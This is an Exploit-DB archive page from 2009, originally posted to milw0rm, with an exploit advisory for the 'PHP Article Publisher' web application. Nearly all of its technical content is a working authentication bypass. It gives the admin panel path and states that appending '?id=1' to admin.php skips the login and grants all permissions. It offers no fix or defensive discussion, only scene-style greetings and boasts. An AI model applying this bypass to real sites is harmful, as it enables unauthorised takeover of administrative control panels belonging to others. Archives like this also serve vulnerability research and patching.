PHP Article Publisher - Arbitrary Authentication Bypass

EDB-ID:

8750

CVE:

N/A




Platform:

PHP

Date:

2009-05-20


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

--------------------------------------------------------------
PHP Article Publisher Arbitrary Auth Bypass Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
download from:http://www.graugon.com/publisher/download.html
Thank You Very Much ahmadbady
Note: Jmaa asmehouna ala ihdae pcq thaghra meshi meliha :)
---------------------------------------------------------------
Exploit:
------
path of control panel is
http://localhost/php_article_publisher/publisher/admin.php
The panel Wanted Pass and user.
exploit is :
------------
http://localhost/php_article_publisher/publisher/admin.php?id=1
Boooom !!Control panel Bypassed
Then Return in Home page admin.php
Note:You have all permission :)
----
Note2: Tested On localhost
-----
----------------------------------------------------------------
Greetz : His0k4 &AhmadBady & Cyb3r-Dev!L
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]